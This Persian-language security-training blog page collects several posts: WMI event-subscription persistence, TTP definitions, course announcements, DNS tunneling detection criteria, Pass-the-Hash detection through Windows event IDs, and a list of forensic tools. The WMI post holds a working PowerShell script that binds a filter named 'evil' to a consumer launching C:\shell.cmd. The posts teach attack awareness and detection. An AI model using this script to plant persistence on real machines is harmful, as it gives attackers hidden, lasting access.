آکادمی روزبه

سلام دوستان 
در این بخش می خواهیم یکی از روش های بسیار پیشرفته مهاجمین را برای Persistence و Privilege Escalation بررسی کنیم. همچنین در قسمت بعد نحوه شناسایی با ابزار های sysmon و autoruns بررسی می نماییم.

WMI یا Windows Managent Instrumentation برای مدیریت سیستم های ماکروسافتی به صورت  local یا remote می باشد. برای مثال همه موارد زیر توسط این ماژول قابل انجام می باشد: 

1. اجرا کردن یک Process بر روی یک کامپیوتر در شبکه بصورت ریموت
2. زمانبندی کردن اجرا یک برنامه یا Process در زمان تعیین شده و در روزهای خاص
3. Reboot کردن یک کامپیوتر از راه دور
4. تهیه لیست سخت افزارها و نرم افزارهای موجود در سیستم های شبکه
5. Query گرفتن از Event های یک سیستم بصورت Local یا بصورت ریموت

حالا سه یخش مهم WMI را با هم بررسی می نماییم:

1. event filters: شروطی که سیستم به آن گوش می دهد مانند ایجاد یک پروسس
2. event consumers: هنگامی که event filter فعال گردد, ماژول consumers اقدامی انجام می دهد مانند اجرای یک اسکریپت
3. filter to consumer bindings: ارتباط بین موارد فوق را ایجاد می نماید. 

حال کد زیر را برای درک بیشتر بررسی می نماییم: 

# WMI __EVENTFILTER
$wmiParams = @{
    ErrorAction = 'Stop'
    NameSpace = 'root\subscription'
}

$wmiParams.Class = '__EventFilter'
$wmiParams.Arguments = @{
    Name = 'evil'
    EventNamespace = 'root\CIMV2'
    QueryLanguage = 'WQL'
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 1200"
}
$filterResult = Set-WmiInstance @wmiParams

# WMI __EVENTCONSUMER
$wmiParams.Class = 'CommandLineEventConsumer'
$wmiParams.Arguments = @{
    Name = 'evil'
    ExecutablePath = "C:\shell.cmd"
}
$consumerResult = Set-WmiInstance @wmiParams

#WMI __FILTERTOCONSUMERBINDING
$wmiParams.Class = '__FilterToConsumerBinding'
$wmiParams.Arguments = @{
    Filter = $filterResult
    Consumer = $consumerResult
}

$bindingResult = Set-WmiInstance @wmiParams

در اینجا ابتدا مهاجم دسترسی خود را حفظ می نماید و بعد از اجرای پیلود همیشه در سیستم باقی می ماند. 

این روزها در مورد TTP زیاد میشنوید

Tactics, techniques and procedures

اینها مراحلی برای انجام عمل خرابکارانه هستند که در حوزه امنیت اطلاعات استفاده میشوند

حالا با مثالی این موراد را بررسی میکنیم

تاکتیک :

راه مورد پسند و انتخابی برای رسیدن به هدف چیه ؟

خیلی کلی

مثلا هوایی برویم به اصفهان یا زمینی

یا قراره یک وبسایت رو پایین بیاوریم که تصمیم تاکتیکی آن است که به روش اجرای کد مخرب روی اون این کار  انجام بشود . معمولا تصمیمات تاکتیکی توسط مدیر پروژه یا خبره ترین فرد گروه اخذ میشود

تکنیک

با چه سیله ای این کار رو انجام بدیم

مثلا اگر زمینی میرویم با اتوبوس یا با تاکسی برویم

یا در مورد مثال حمله به سایت ،  از طریق تزریق کد درPHP به هدف برسیم

پراسیجر :

دقیقا چطور حمله رو انجام بدیم قدم به قدم 

ساعت چند به سمت اصفهان حرکت کنیم و وسط راه توقف داشته باتشیم ؟

در مثال  تست نفوذ:  ماژول ها رو در فریم ورک متاسپلویت به چه ترتیبی لود کنیم

درسهای مرتبط 504 و 460و 542

با توجه به نیاز کشور به دوره های معماری و بنیادین در حوزه امنیت و فناوری اطلاعات، بر آن شدیم دوره های ذیل را در دستور کار آکادمی روزبه قرار دهیم .

انشالله از شهریور ماه این دوره ها با اساتید حاذق ارایه خواهند شد

CISA : مدرک ممیزی و بازرسی سیستم های اطلاعاتی و فناوری اطلاعات

CRISC:مدرک ریسک فناوری اطلاعات

CSSPL: مدرک مهندسی امنیت چرخه تولید و پیاده سازی نرم افزار

CISM : مدرک مدریت امنیت که نسبت به CISSP  دارای بعد مدیریتی بیشتر ولی بعد فنی کمتر است

ضمنادر این حین به جمع دوره های فنی قبلی ، دووره 30 ساعته  Threat Hunting  را اضافه کردیم که با توجه به قوام نیافتگی بازار آموزش کشور در این حوزه ، لازم دیدیم اول یک شکل و ساختاری برای آموزش این حوزه ارایه گردد تا به کج راهه نرویم لذا تنها دوره آکادمی که سرفصل اختصاصی دارد این دوره است که با تایید و امضای اینجانب به اجرا در خواهد آمد

و درنهایت اینکه دوره رایگان بررسی کنترل های CIS  ، جمعه ها در ایسمینار آکادمی روزبه برگزار میگردد

به امید توانمدی برای توسعه دوره ها و فعالیت ها

روزبه نوروزی

سلام دوستان

همانطور که می دانید پروتکل DNS نام دامنه هارا به آدرس اینترنتی (IP) تبدیل می نماید. خیلی از نرم افزارها و تجهیزات شبکه از پروتکل برای برقرار ارتباط شان استفاده می نمایند. بدافزارها و تروجان ها برای مخفی ماندن و دورزدن تجهیزات امنیتی نیز می توانند از پروتکل DNS بهره برداری کنند.

هدف مون از ارایه این use case: شناسایی DNS tunneling و دامین های domain generation algorithm (DGA) و مشکوک ترین TLD ها منابع لاگ و پیشنیازها:‌ sysmon event id 22

مدت زمان پایش: ۳۰ روز (یکماه)

۱) کلاینت هایی که حجم بالایی از رکورد های ( TXT, NULL, CNAME ) را تولید کرده اند. 

۲) ببیشتر ارتباطات C&C ها با بدافزارشان از طریق درخواست های ( TXT and CNAME ) انجام می پذیرد.

۳) شناسایی TLD های ( .xyz, .me, .biz ) 

۴) جمع آوری و فیلترنمودن کویری هایی که پاسخ NXDOMAIN دریافت کرده اند.

۵) شناسایی کلاینت هایی که sub domain های یک دامنه را به طور مکرر درخواست نمایند. 

۶) شناسایی دامنه های با طول بیشتر از ۲۵ کاراکتر. 

۷) محاسبه entropy. 

۸) شناسایی دامنه هایی که به تازگی ثبت شده اند. 

۹) پورت ۵۳  TCPرا فقط در ترافیک ورودی اجازه دهید و ترافیک zone transfer فقط بین دو سرور primary و  secondary سازمان برقرار باشد.

در دنیای امروزه مدیریت پروژه یکی از ارکان جهت ساز و مهم در موفقیت پروژه ها است . تا کنون چند "به روش" یا به نوعی استاندارد مدیریت پروژه معرفی شده اند اما در میان آنها PMBOKو Prince2 بیشتر از دیگران مورد توجه قرار گرفت است.

اصولا فراگیری PMBOK سنگین تر از prince2  است اما دست مدیر پروژه در انتخاب مسیر در PMBOK بازتر است .مدرک رسمی صادره  از سوی سازمان PMI برای آنان که آزمون PMBOK را با موفقیت پشت سر بگذاند PMP  خواهد بود .

این مدرک نشان میدهد که دارنده با تسط به سرفغصل های استاندارد معتبر PMBOK توانایی راهبری و مدیریت پروژه ها را دارد .

دیروز بصورت رسمی نسخه هفتم از استاندارد PMBOK منتشر شد . که لازم است این موضوع را به تمامی مدیران پروژه تبریک بگویم

روزبه نوروزی

در این مقاله به Pass-The-Hash میپردازیم که هکر با استفاده از آن تلاش میکند بین هاست ها حرکت کند . این حرکت با استفاده از پروتکل NTLM و بدون نیاز به پسورد کاربر انجام میگیرد.ابزاری که در این مقاله معرفی میگردد بنام (Ketshash) کمک موثری در کشف PTH است در این مثال به بحث Over-Pass-The-Hash (OPTH)نمیپردازیم

تعیین هویت بدون پسورد :

در هشی که مایکروسافت درویندوز استفاده میکند SALT  وجود ندارد لذا تمام پسورد های یکسان که با پروتکل NTLM  هش میشوند دارای هش یکسان است لذا اگر از روی هش یک کاربر به پسورد آن برسیم (برای مثال از طریق Rainbow Table ) پسورد تمام کاربرانی که هش آنها مشابه هش کشف شده است را داریم .

هنگام انجام تعیین هویت با NTLM  شماره رویداد 4624با لاگین تایپ 3 و Authentication Package NTLM (or by logon process name NtLmSsp)

در لاگ میافتد

شکل زیر

هنگام استفاده از روش PTH  دو راهکار مد نظر است :

تزریق هش پسوردی که داریم در LSAS.exe و بازکردن یک سشن با هش تزریق شده

استفاده از قسمتی از پروتکل NTLM  برای تعیین هویت با هش و ارسال دستور روی شبکه با پروتکلی نظیر SMB یا WMI

هرگاه استفاده از پسورد قبل از ارتباط NTLM را دیدید به آن کاری نداشته باشید

کانکشن های بی مشکل عبارتند از :

4768 – A Kerberos authentication ticket (TGT) was requested

4769 – A Kerberos service ticket (TGS) was requested

4648 – A logon was attempted using explicit credentials

4624 – An account was successfully logged on

Logon types: 2 (Interactive), 7 (Unlock), 10 (RemoteInteractive) or 11 (CachedInteractive).

به کدام ارتباطات NTLM شک کنیم :

هرگاه یک سشن با اکانت غیر قدرتمند از طریق ارتباط NTLM  ساخته شده بود

با کمک از این ابزار ، عملیات جستجو در لاگ ها برای یافتن ترتیبی که در فوق شرح داده شد را تسریع میبخشیم

https://github.com/cyberark/ketshash

این قسمت : ایمیج گیری و دامپینگ 

اصولا در هر پرونده جرم شناسی بایستی از هارد و RAM نسحه ای کامل تهیه گردد. برای هارد این نسخه با کپی گیری تفاوت دارد چرا که در جرم شناسی  بیت به بیت فضای هارد را میخواند.

لذا برای این کار نرم افزار های مخصوصی باید مورد استفاده قرار گیرند

در زیر لیست این نرم افزار های که رایگان هستند و از آنها در مراحل مختلف فارنزیک استفاده میشود  آورده شده است

SIFT Workstation

Autopsy

FTK Imager

 DEFT

Volatility

LastActivityView

HxD

CAINE

Redline

PlainSight